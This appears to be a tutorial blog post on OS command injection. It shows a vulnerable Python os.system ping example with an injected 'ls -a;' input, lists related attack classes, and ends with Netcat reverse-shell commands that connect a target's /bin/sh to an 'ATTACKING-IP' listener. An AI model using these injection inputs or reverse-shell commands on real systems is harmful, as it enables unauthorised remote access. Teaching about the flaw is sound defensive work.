Command execution: OWASP top vulnerability
what is command execution?
The Command injection is also known as OS command injection is a way of exploiting system applications with running external OS commands by obtaining the shell which can be caused by poor sanitization or validation of the user input. And which might lead to the execution of arbitrary command execution on the target system. This may also lead to the compromisation of the whole database by an attacker which may include the user's personal information.
the attacker can request, delete, add, edit the information (eg. XML config files)from the compromised system or may even inject a backdoor into the system so he can access it later.
The chances of finding this vulnerability increases when the developer uses system() or equivalent commands in its source code.
import osdomain = user_input() #enter the website to trace
os.system('ping'+ domain) #counts the hops to domain
the above code will ping the domain entered by the user. But you may notice the user input is not being filtered before passing to the system() which executes the command on the system.
so what if the user decided to enter the input which is not expected by the developer in this case eg.
import osdomain = user_input() #ls -a;
os.system('ping'+ domain) #counts the hops to domain
in this case, the domain variable will store the command ‘ls -a ;’ in it, and the preceding command is terminated by ‘;’ allowing you to put another command.
ls -a ; pingso here system will execute the ‘ls -a’ command and the ‘ping’ command with no attribute. you can also include other commands instead of ls -a.
But you might be thinking about,
Why do the applications need to execute the system commands?
well, obviously because the application needs to communicate with the system for its internal functions or it might want to run the other applications or might want to run the programs written in other programming languages.
so it concludes how useful it is to make system() calls, it is a very useful feature unless it's used legitimately.
command injection
ok so it ain't a problem for the user but this can open a whole lot of opportunities for the attacker, the worst thing that could happen is the attacker can spawn a reverse shell and execute the command injection attack on the webserver(target system). And to add up to this scenario we have a whole bunch of reverse shells to use you can get them from here.
methods
the following are the different types of command injection attacks that are caused by the same vulnerabilities.
Arbitrary command injection
poor sanitization or validation of user input can lead to this vuln. here attackers can inject malicious commands into the system.
Arbitrary file uploads
a website that allows file upload without validating the extension or data in the file can lead to exploitation by this vulnerability, this type of exploitation may fall in the category of code injection where the malicious chunk of code is uploaded.
Insecure serialization
every communication needs serialization and deserialization of data but if the deserialization(server-side) of data occurs without any proper verification it can result in command execution.
Server-side template injection (SSTI)
This vulnerability allows attackers to insert malicious server-side template which is used by many server-side applications to generate the valid HTML response.
XML external entity injection (XXE)
XXE is an attack vulnerability that abuses the feature of XML parsers/data. It can lead to exposure of sensitive data, server-side request forgery(SSRF), or denial of service attack.
attacking
In this article, we’re going to focus on Netcat reverse shell.
A reverse shell is a shell initiated from the target machine back to the attacker host which is in a listening state to pick up the shell. The bind shell is set up on the target host (in this case by injection) with a specific port which will then initiate the connection to the attacker’s device, hence establishing the connection. the reverse shell can also be referred to as a backdoor (exactly as it sounds like).
steps:
- setting up the listener on the attacker's device.
- initiate the connection from the target device.
- issue commands and enjoy your reverse shell.
you should set up the listener first as shown below.
nc -lvp 80next step we execute the following command to initiate the connection on the target host with the help of the following command.
nc ATTACKING-IP 80 -e /bin/shif this doesn’t work then
/bin/sh | nc ATTACKING-IP 80there is a whole collection of reverse shells here, so just don’t limit yourself with Netcat try new shells too.
